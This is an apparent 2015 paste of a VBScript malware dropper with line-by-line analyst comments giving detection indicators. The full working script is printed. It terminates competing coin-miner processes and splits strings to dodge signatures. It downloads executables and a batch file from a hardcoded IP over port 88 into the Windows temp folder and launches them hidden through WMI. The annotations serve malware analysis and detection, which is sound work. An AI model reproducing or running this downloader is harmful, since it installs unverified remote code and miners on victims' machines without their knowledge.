benkow_

Untitled

Sep 23rd, 2015
  ' Analyst note: script prologue. Suppresses runtime errors, reads three host
  ' properties from the registry through the WMI StdRegProv provider, resolves
  ' the Windows folder, and initialises the "download needed" flag.
  ' On Error Resume Next means any failing statement below is skipped silently,
  ' so the script leaves no error dialog or script-host error output behind.
  1. On Error Resume Next
  2. Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService
  ' Registry access goes through WMI (root\DEFAULT:StdRegProv), not reg.exe or
  ' WScript.Shell, so it appears as WMI activity rather than a child process.
  3. Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\DEFAULT:StdRegProv")
  ' &H80000002 is HKEY_LOCAL_MACHINE. The three reads fetch the default language
  ' id, the Windows version string and the processor count into OSlag, OSver
  ' and numcpus. None of the three is referenced again in the visible listing.
  4. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Nls\Language", "Default",OSlag)
  5. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion",OSver)
  6. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "NUMBER_OF_PROCESSORS",numcpus)
  7. Set objFSO = CreateObject("Scripting.FileSystemObject")
  ' GetSpecialFolder(0) returns the Windows folder.
  8. windir = objFSO.GetSpecialFolder(0)
  ' needdl = 1 means "payload must be downloaded"; the process sweep further
  ' down resets it to 0 when a matching process is already running.
  9. Dim needdl
  10. needdl = 1
  11.  
  ' Analyst note: table of eight browser User-Agent strings (indexes 0-7); the
  ' last two entries are identical. One entry is picked at random per run and
  ' sent by dl() on every HTTP request.
  ' Detection: these are dated browser builds on Windows NT 6.1, and the request
  ' is actually issued by a script host through WinHTTP. A proxy or EDR record
  ' where one of these User-Agent values comes from wscript/cscript rather than
  ' a browser process is a usable signal.
  12. user_agent_list=array("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", _
  13. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", _
  14. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16", _
  15. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", _
  16. "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15", _
  17. "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", _
  18. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", _
  19. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)")
  ' Randomize seeds Rnd; CInt(7*Rnd()) rounds to an integer in 0..7, which is
  ' the index range of the array above.
  20. Randomize
  21. X=CInt(7*Rnd())
  22.  
  ' Analyst note: two passes over the local process list via WMI. Pass 1 ends
  ' processes matching two fixed markers. Pass 2 decides whether the payload is
  ' already running and ends processes whose command line looks like a coin
  ' miner (stratum URL). A script host that enumerates Win32_Process and calls
  ' Terminate on unrelated processes is itself a behavioural indicator.
  23. strComputer = "."
  24. Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
  ' The WQL text is built from fragments; joined, it reads
  ' "SELECT * FROM Win32_Process". Presumably split to defeat literal-string
  ' matching, so content rules should not rely on the contiguous query text.
  ' Flag 48 = wbemFlagReturnImmediately + wbemFlagForwardOnly.
  25. Set cols=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
  26. For Each objItemm in cols
  ' Case-insensitive match on a command-line switch and an executable name.
  ' What these two markers belong to is not shown on this page.
  27. If InStr(1,LCase(objItemm.CommandLine), LCase("-manliana")) > 0 Then objItemm.Terminate
  28. If InStr(1,LCase(objItemm.ExecutablePath), LCase("smssm.exe")) > 0 Then objItemm.Terminate
  29. Next
  ' Five-second pause before the second enumeration.
  30. wscript.sleep 5000
  31. Set colProcessList1=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
  32. For Each objItem in colProcessList1
  ' Case-sensitive search for two fixed 34-character strings in the command
  ' line; a hit clears needdl, so the download stage is skipped. They look like
  ' payout/wallet identifiers -- NOTE(review): inferred from context, confirm.
  ' Either string in a process command line is a host-level indicator.
  33. If InStr(1,objItem.CommandLine, "CGX2U2oeocN3DTJhyPG2cPg7xpRRTzNZkz") > 0 Then needdl = 0
  34. If InStr(1,objItem.CommandLine, "CcTzQsSWvf1zhbMA3kf2rpYxogEMcVjmJ3") > 0 Then needdl = 0
  ' Any process with a stratum URL on its command line is terminated. The check
  ' runs for every process, including one that just matched the lines above.
  35. If InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0 Then
  36. objItem.Terminate
  37. End If
  ' notsyspath is True unless the image path contains one of five system32
  ' binaries (lsass, services, csrss, winlogon, smss).
  38. notsyspath = not(InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\lsass.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\services.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\csrss.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\winlogon.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\smss.exe") > 0)
  ' hcline is True when the command line contains "-datadir=", "ypool.net" or
  ' a stratum URL.
  39. hcline = InStr(1,LCase(objItem.CommandLine), "-datadir=") > 0 Or InStr(1,LCase(objItem.CommandLine), "ypool.net") > 0 Or InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0
  40. if notsyspath and hcline then
  ' This call targets objProcess, which is not assigned anywhere in the visible
  ' listing (the loop variable is objItem); with errors suppressed the
  ' statement is skipped, so this branch has no observable effect here.
  41. objProcess.Terminate
  42. End If
  43. Next
  44.  
  ' Analyst note: download-and-execute stage, reached only when the process
  ' sweep left needdl at 1. Indicators visible in this block:
  '   network : http://66.186.188.227:88/ (objects 32.exe, 64.exe, mst.bat),
  '             plain HTTP on port 88
  '   files   : c:\windows\temp\mstdc.exe, c:\windows\temp\sst.bat
  ' The name mstdc.exe is one transposition away from the legitimate msdtc.exe;
  ' presumably chosen to blend in. Nothing here verifies the downloaded content
  ' (no hash, signature or HTTP status check).
  45. If needdl = 1 Then
  ' X86orX64() returns "x86", "x64" or the raw SystemType string; any other
  ' value matches neither branch and nothing is fetched.
  46. OStype = X86orX64()
  47. if OStype = "x86" Then
  ' The remote executable name depends on the architecture, but both branches
  ' write it to the same local path.
  48. dl "http://66.186.188.227:88/32.exe","c:\windows\temp\mstdc.exe"
  49. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
  ' Only the batch file is started directly. Its content is not on this page,
  ' so how mstdc.exe gets launched cannot be confirmed from here.
  50. runprg "c:\windows\temp\sst.bat"
  51. WScript.Quit
  52. ElseIf OStype = "x64" Then
  53. dl "http://66.186.188.227:88/64.exe","c:\windows\temp\mstdc.exe"
  54. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
  55. runprg "c:\windows\temp\sst.bat"
  56. WScript.Quit
  57. End If
  58. End If
  ' dl(u, f): fetch URL u with a synchronous HTTP GET and write the raw response
  ' body to local path f, overwriting any existing file. Sets no return value.
  ' Analyst note: the COM ProgIDs are concatenated from fragments; joined they
  ' are "WinHttp.WinHttpRequest.5.1" and "Adodb.Stream". Presumably split to
  ' avoid literal-string signatures. Instantiation of this COM pair by a script
  ' host is a common downloader pattern worth alerting on.
  59. Function dl(u,f)
  60. dim xHttp:Set xHttp = createobject("WinH" & "ttp.WinHt" & "tpRequ" & "est.5.1")
  61. dim bStrm:Set bStrm = createobject("Ad" & "od" & "b.S" & "tre" & "am")
  ' Third argument 0 = not asynchronous; Send blocks until the response arrives.
  62. xHttp.Open "GET",u, 0
  ' X is the script-level random index chosen once per run.
  63. xHttp.SetRequestHeader "User-Agent", user_agent_list(X)
  64. xHttp.Send
  ' The HTTP status is never inspected; whatever body comes back is written out.
  65. with bStrm
  ' type = 1 selects binary mode.
  66. .type = 1
  67. .open
  68. .write xHttp.responseBody
  ' Save option 2 = create the file or overwrite an existing one.
  69. .savetofile f,2
  70. .close
  71. end with
  72. End Function
  ' runprg(ppath): start ppath as a new process through the WMI
  ' Win32_Process.Create method with a hidden window. Sets no return value and
  ' does not inspect the result of Create.
  ' Analyst note: a process started this way is typically parented by the WMI
  ' provider host rather than by the script host, so parent/child rules keyed on
  ' wscript/cscript will not see it; correlate on WMI process-creation telemetry
  ' and on the command line instead.
  73. Function runprg(ppath)
  74. Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2")
  75. Set objStartup = objPS.Get("Win32_ProcessStartup")
  76. Set objConfig = objStartup.SpawnInstance_()
  ' ShowWindow = 0 hides the new process's window.
  77. objConfig.ShowWindow = 0
  78. Set objShare = objPS.Get("Win32_Process")
  ' Build the input-parameter object for Create and fill in the command line
  ' and the startup configuration prepared above.
  79. Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
  80. objInParam.Properties_.Item("CommandLine") = ppath
  81. objInParam.Properties_.Item("ProcessStartupInformation") = objConfig
  82. Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
  83. End Function
  ' X86orX64(): classify the host architecture from the SystemType property of
  ' Win32_ComputerSystem. Returns "x86" when the value contains "86", "x64" when
  ' it contains "64", otherwise the raw SystemType string. The "86" test runs
  ' first. If the query fails the return value stays unset, because errors are
  ' suppressed inside the function as well.
  84. Function X86orX64()
  85. On Error Resume Next
  86. strComputer = "."
  87. Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  ' Flag 48 = wbemFlagReturnImmediately + wbemFlagForwardOnly.
  88. Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
  ' If several objects are returned, the last one decides the result.
  89. For Each objItem in colItems
  90. If InStr(objItem.SystemType, "86") <> 0 Then
  91. X86orX64 = "x86"
  92. ElseIf InStr(objItem.SystemType, "64") <> 0 Then
  93. X86orX64 = "x64"
  94. Else
  95. X86orX64 = objItem.SystemType
  96. End If
  97. Next
  98. End Function
  ' wlog(slog): write the single line slog to <Windows folder>\wb2010kb.log,
  ' replacing any existing file. Sets no return value.
  ' Analyst note: no call to wlog appears in the visible listing, so the log
  ' file is only a potential artifact of this sample; if the file is found on a
  ' host, check whether another variant or stage produced it.
  99. Function wlog(slog)
  100. Set objFSO = CreateObject("Scripting.FileSystemObject")
  ' GetSpecialFolder(0) returns the Windows folder.
  101. windir = objFSO.GetSpecialFolder(0)
  ' Second argument 1 (True) allows overwriting an existing file.
  102. Set f = objFSO.CreateTextFile(windir + "\wb2010kb.log",1)
  103. f.WriteLine(slog)
  104. f.Close
  105. Set objFSO = Nothing
  106. End Function